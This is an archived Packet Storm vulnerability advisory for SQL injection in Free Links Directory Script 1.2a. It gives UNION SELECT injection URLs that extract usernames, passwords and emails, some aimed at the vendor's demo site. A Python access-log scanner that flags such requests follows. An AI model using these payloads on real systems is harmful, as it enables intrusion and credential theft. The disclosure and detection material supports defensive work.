Free Links Directory Script 1.2a SQL Injection

2008-12-15T00:00:00
ID PACKETSTORM:73006
Type packetstorm
Reporter baltazar
Modified 2008-12-15T00:00:00

Description

                                        
                                            `################################################################   
# darkc0de crew - est.2007 - forum.darkc0de.com #
################################################################   
# --- d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu #   
# --- QKrun1x - skillfaker - Croathack - Optyx - Nuclear #  
# --- Eliminator and to all members of darkc0de and ljuska.org# #  
################################################################   
#   
# Author: baltazar and sinner_01   
#   
# Home : www.darkc0de.com & ljuska.org  
#   
# Email : b4ltazar@gmail.com, sinn3r01@gmail.com  
#   
# Share the c0de!   
#   
################################################################   
#   
# App Name: Free Links Directory Script v1.2a  
#   
# App Home: http://flds-script.com/  
#   
# Dork: N/A   
#   
# POC: /redir.php?id=1+and+1=2+union+all+select+0,1,username,3,4,5,6,7,8,9,10+from+users+limit+2,1--  
# /redir.php?id=1+and+1=2+union+all+select+0,1,password,3,4,5,6,7,8,9,10+from+users+limit+2,1--  
# /redir.php?id=1+and+1=2+union+all+select+0,1,email,3,4,5,6,7,8,9,10+from+users+limit+2,1--  
# DEMO:  
# http://flds-script.com/demo/redir.php?id=1+and+1=2+union+all+select+0,1,username,3,4,5,6,7,8,9,10+from+users+limit+2,1--  
# http://flds-script.com/demo/redir.php?id=1+and+1=2+union+all+select+0,1,password,3,4,5,6,7,8,9,10+from+users+limit+2,1--  
# http://flds-script.com/demo/redir.php?id=1+and+1=2+union+all+select+0,1,email,3,4,5,6,7,8,9,10+from+users+limit+2,1--  
#   
# Vuln Discovered 13/12/2008   
  
`
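A defender-side check for the request pattern in the POC above, as an added example (not part of the original advisory or the application's code): it scans web access logs for `redir.php` requests whose `id` parameter is not a plain integer. The log lines, the function names and the assumption that a legitimate `id` is always numeric are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines; client addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Dec/2008:10:00:01 +0000] "GET /redir.php?id=17 HTTP/1.1" 302 0',
    '198.51.100.7 - - [15/Dec/2008:10:00:05 +0000] "GET /redir.php?id=1+and+1=2+union+all+select+0,1,username,3,4,5,6,7,8,9,10+from+users+limit+2,1-- HTTP/1.1" 302 0',
    '198.51.100.7 - - [15/Dec/2008:10:00:09 +0000] "GET /demo/redir.php?id=1%20AND%201=2%20UNION%20ALL%20SELECT%200,1,email,3+FROM+users-- HTTP/1.1" 302 0',
    '203.0.113.5 - - [15/Dec/2008:10:00:40 +0000] "GET /redir.php?id=17%27 HTTP/1.1" 302 0',
    '192.0.2.44 - - [15/Dec/2008:10:01:00 +0000] "GET /index.php?id=abc HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify_id(value):
    """Return 'ok' for a plain integer id, otherwise the reason it is flagged."""
    if re.fullmatch(r"\d{1,10}", value):  # assumption: valid ids are short integers
        return "ok"
    if re.search(r"\bunion\b.*\bselect\b", value.lower(), re.S):
        return "union-select"
    return "non-numeric"

def scan(lines):
    """Return (client, verdict, decoded id) for each suspicious redir.php request."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/redir.php"):
            continue
        # parse_qs decodes '+' and %xx, so encoded variants are compared in one form
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            verdict = classify_id(value)
            if verdict != "ok":
                findings.append((line.split()[0], verdict, value))
    return findings

if __name__ == "__main__":
    for client, verdict, value in scan(SAMPLE_LOG):
        print(f"{client}\t{verdict}\t{value}")
```

Log matching only surfaces attempts; the fix belongs in the application, which should cast `id` to an integer or bind it as a query parameter before it reaches the database.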